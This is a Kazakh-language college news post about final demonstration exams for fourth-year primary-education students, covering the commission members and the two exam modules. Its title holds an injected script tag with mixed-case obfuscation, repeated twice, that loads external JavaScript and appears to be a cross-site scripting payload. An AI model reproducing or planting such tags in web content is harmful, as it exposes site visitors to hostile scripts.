ДЕМОНСТРАЦИЯЛЫҚ ЕМТИХАН<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.06.2024

2024 жылдың 4-5 маусым күндері аралығында Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде 0105000 – «Бастауыш білім беру» мамандығы, 010501 3 – «Бастауыш білім беру мұғалімі» біліктілігі бойынша білім алатын ІV курс студенттері, яғни БМ-41 тобында қорытынды аттестаттау (демонстрациялық) емтихандары өтті. 
Демонстрациялық емтиханға қорытынды аттестаттау комиссиясының мүшелері Ш.Уәлиханов атындағы Көкшетау университетінің Үздіксіз білім беру институтының басшысы, қауымдастырылған профессор, PhD доктор Калымова Асель Кайратовна, Көкшетау қаласы, № 16 ОМ, педагогика ғылымдарының магистрі, бастауыш сынып мұғалімі, тәрбие ісі меңгерушісі Утильбекова Шынар Сапарбековна қатысты.
WorldSkills кәсіптік стандартына сәйкес «Бастауыш сыныптарда оқыту» құзыреттілігі бойынша А және В модульдері негізіндегі демонстрациялық  емтихан студенттің кәсіби білімін, дағдысын, берілген тапсырмаларды шығармашылықпен шеше алатын тұлға ретінде, болашақ маман ретінде көрінуіне мүмкіндік береді. 
А модулі бойынша интерактивті жабдықты пайдалана отырып, бастауыш 2 сынып қазақ тілі, математика, дүниетану пәндері бойынша (пәндердің бірін таңдай отырып) оқу сабағының үзіндісін (жаңа білімді ашу кезеңі) әзірлеп ұсынды. 
B модулінде оқу пәндерінің бірінде белгілі бір тақырыпты меңгеруді қамтамасыз ететін деңгейлік оқыту тапсырмаларын әзірлеп, көрсетті.
БМ-41 тобының студенттеріне алдағы дипломдық жобаны қорғауда сәттілік тілейміз

Просмотров: 2320


Пікір қосу



Деректерді қолтаңбаға қосу